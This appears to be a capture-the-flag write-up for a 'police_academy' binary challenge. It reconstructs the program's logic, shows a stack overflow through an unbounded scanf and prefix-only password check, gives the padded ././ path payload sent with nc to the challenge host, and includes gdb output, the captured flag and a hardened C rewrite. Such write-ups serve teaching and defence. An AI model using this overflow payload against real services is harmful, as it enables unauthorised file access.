Problem

Chris is trying out to be a police officer and the applications have just been sent into the police academy. He is really eager to find out about his competition. Help him hack the system and view the other applicants' applications.

The service is running at 128.199.224.175:13000

Hint! Path Traversals are always a classic.

Files

police_academy  b2ccb10e093cc003d5227d9c5e57c009

Solution

To solve it, first understand the program flow. The sketch below is a reconstruction of the binary's logic, not its source:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void print_record(char *name) {
  if (strlen(name) == 36) {
    // display the file's contents
  }
}

int main(void) {
  char name[64];    // holds the record file name passed to print_record
  char input[16];   // password buffer; scanf("%s") has no length limit, so a long
                    // token runs past it into the neighbouring stack data
  int num;
  scanf("%s", input);
  if (strncmp(input, "kaiokenx20", 10) == 0) {   // only the 10-byte prefix is checked
    scanf("%d", &num);
    switch (num) {
      case 1: case 2: case 3: case 4: case 5: case 6:
        snprintf(name, sizeof name, "Application_%d", num);  // name assumed from the menu
        break;
      case 7:
        strcpy(name, "flag.txt");
        printf("you have no permission\n");
        exit(1);
    }
    print_record(name);
  }
  return 0;
}

The program starts by checking whether the input begins with the password kaiokenx20 (only that prefix is compared, and scanf("%s") does not limit how much is read). If it does, execution moves on to the switch and finally to print_record, which expects a file name exactly 36 characters long. To open flag.txt we can therefore overwrite the stack by filling the first input with kaiokenx20 and then the second with AAAAAA././././././././././././././flag.txt. The A's are padding so that the name buffer ends up holding exactly ././././././././././././././flag.txt (36 characters).
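A hardened version of the same program, added here as an example that is not from the original writeup or the challenge binary (the record table, buffer sizes and messages are assumptions): it bounds the read with fgets so a long token cannot spill into neighbouring stack buffers, compares the whole password rather than a prefix, takes the file name from a fixed table instead of user-controlled memory, and refuses any name containing a path separator or ".." before it reaches fopen.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PASSWORD "kaiokenx20"   /* assumed; same value the writeup uses */
#define NUM_RECORDS 6

/* Bounded line read: fgets never writes more than 'size' bytes, so an
 * over-long line cannot overflow the buffer the way scanf("%s") does.
 * Returns 0 on success, -1 on EOF/error. Extra bytes beyond the buffer are
 * discarded so they cannot be mistaken for the next input. */
int read_line(char *buf, size_t size, FILE *in) {
  if (fgets(buf, (int)size, in) == NULL) return -1;
  size_t len = strlen(buf);
  if (len > 0 && buf[len - 1] == '\n') {
    buf[len - 1] = '\0';
  } else {
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n') { }
  }
  return 0;
}

/* Full-string comparison: a prefix check with strncmp(input, PASSWORD, 10)
 * accepts any input that merely starts with the password. */
int password_ok(const char *input) {
  return strcmp(input, PASSWORD) == 0;
}

/* The menu choice selects from a fixed table (names assumed from the menu);
 * user bytes never become a path. The flag is simply not in the table. */
const char *record_for_choice(int num) {
  static const char *const records[NUM_RECORDS] = {
    "Application_1", "Application_2", "Application_3",
    "Application_4", "Application_5", "Application_6",
  };
  if (num < 1 || num > NUM_RECORDS) return NULL;
  return records[num - 1];
}

/* Defence in depth before fopen(): reject separators and ".." so that a name
 * cannot leave the records directory even if it somehow reached this point.
 * "././././././././././././././flag.txt" is rejected on its first '/'. */
int name_is_safe(const char *name) {
  if (name == NULL || name[0] == '\0') return 0;
  if (strchr(name, '/') != NULL || strchr(name, '\\') != NULL) return 0;
  if (strstr(name, "..") != NULL) return 0;
  return 1;
}

/* Hardened print_record: returns 1 if the file was shown, 0 if refused. */
int print_record(const char *name) {
  if (!name_is_safe(name)) return 0;
  FILE *f = fopen(name, "r");
  if (f == NULL) return 0;
  int c;
  while ((c = fgetc(f)) != EOF) putchar(c);
  fclose(f);
  return 1;
}

int main(void) {
  char input[32];
  char numbuf[16];
  printf("Enter password to authenticate yourself : ");
  if (read_line(input, sizeof input, stdin) != 0 || !password_ok(input)) {
    puts("Wrong password");
    return 1;
  }
  printf("Enter choice :- ");
  if (read_line(numbuf, sizeof numbuf, stdin) != 0) return 1;
  const char *name = record_for_choice(atoi(numbuf));
  if (name == NULL || !print_record(name)) {
    puts("No such record, or you have no permission");
    return 1;
  }
  return 0;
}
```

With these changes the payload from the writeup is stopped three times over: the bounded read truncates it, the full comparison rejects the truncated password, and even a name with "./" in it would never reach fopen.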

gdb-peda$ c
Continuing.



[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe230 ("././././././././././././././flag.txt")
RBX: 0x0 
RCX: 0x0 
RDX: 0xc0f801d000000000 
RSI: 0x400d98 --> 0x72 ('r')
RDI: 0x7fffffffe230 ("././././././././././././././flag.txt")
RBP: 0x7fffffffe200 --> 0x7fffffffe260 --> 0x400d10 (<__libc_csu_init>:    push   r15)
RSP: 0x7fffffffdeb0 --> 0x7fffffffdf44 --> 0x0 
RIP: 0x4008db (<print_record+85>:    mov    rdi,rax)
R8 : 0x1d0 
R9 : 0x7ffff7fcb700 (0x00007ffff7fcb700)
R10: 0x309 
R11: 0x7ffff7a98720 (<strlen>:    pxor   xmm0,xmm0)
R12: 0x400790 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe340 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4008ca <print_record+68>:    jmp    0x400985 <print_record+255>
   0x4008cf <print_record+73>:    mov    rax,QWORD PTR [rbp-0x348]
   0x4008d6 <print_record+80>:    mov    esi,0x400d98
=> 0x4008db <print_record+85>:    mov    rdi,rax
   0x4008de <print_record+88>:    call   0x400750 <fopen@plt>
   0x4008e3 <print_record+93>:    mov    QWORD PTR [rbp-0x338],rax
   0x4008ea <print_record+100>:    cmp    QWORD PTR [rbp-0x338],0x0
   0x4008f2 <print_record+108>:    jne    0x4008fe <print_record+120>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdeb0 --> 0x7fffffffdf44 --> 0x0 
0008| 0x7fffffffdeb8 --> 0x7fffffffe230 ("././././././././././././././flag.txt")
0016| 0x7fffffffdec0 --> 0x24ffffe010 
0024| 0x7fffffffdec8 --> 0x40045c --> 0x735f5f0073747570 ('puts')
0032| 0x7fffffffded0 --> 0x4002f0 --> 0x1200000034 
0040| 0x7fffffffded8 --> 0x7fffffffdf48 --> 0x0 
0048| 0x7fffffffdee0 --> 0x7c9c7b11 
0056| 0x7fffffffdee8 --> 0x1f271ec 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x00000000004008db in print_record ()

So the solution becomes the following:

$ echo kaiokenx20AAAAAA././././././././././././././flag.txt | nc 128.199.224.175 13000
Enter password to authentic yourself : Enter case number: 

     1) Application_1
     2) Application_2
     3) Application_3
     4) Application_4
     5) Application_5
     6) Application_6
     7) Flag

     Enter choice :- 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

The flag is :- pctf{bUff3r-0v3Rfl0wS`4r3.alw4ys-4_cl4SsiC}

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

References
